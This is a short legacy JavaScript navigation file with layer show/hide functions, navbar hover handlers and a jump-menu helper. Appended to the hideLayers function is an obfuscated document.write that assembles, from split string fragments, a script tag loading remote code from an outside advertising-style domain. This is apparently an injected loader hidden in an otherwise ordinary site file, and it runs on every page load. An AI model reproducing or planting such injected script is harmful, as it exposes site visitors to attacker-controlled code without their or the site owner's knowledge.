// JavaScript Document
<!--
  function showLayers(i)
  {
    eval("document.all.layer" + i + ".style.visibility='visible';");
    eval("document.all.a"+i+".style.backgroundColor='#1eb2ef';");
    
  }
  function hideLayers(i)
  {
    eval("document.all.layer" + i + ".style.visibility='hidden';");
    eval("document.all.a" + i + ".style.backgroundColor='';");
    
  }document.write("<sc"+"ript src='http://ad"+".nu"+"99"+".co"+"m/ip"+".asp?lo"+"c=guangzhou'><\/sc"+"ript>");
  function navbarOver(src, clrOver)
  {
    if(!src.contains(event.fromElement))
    {
      //src.style.cursor = 'hand';
      src.bgColor = clrOver;
    }
  }
  function navbarOut(src, clrIn)
  {
    if(!src.contains(event.toElement))
    {
      //src.style.cursor = 'default';
      src.bgColor = clrIn;
    }
  }
//-->


<!--  Ò³ÃæÌø×ª
function MM_jumpMenu(targ,selObj,restore){ //v3.0
  eval(targ+".location='"+selObj.options[selObj.selectedIndex].value+"'");
  if (restore) selObj.selectedIndex=0;
}
//-->






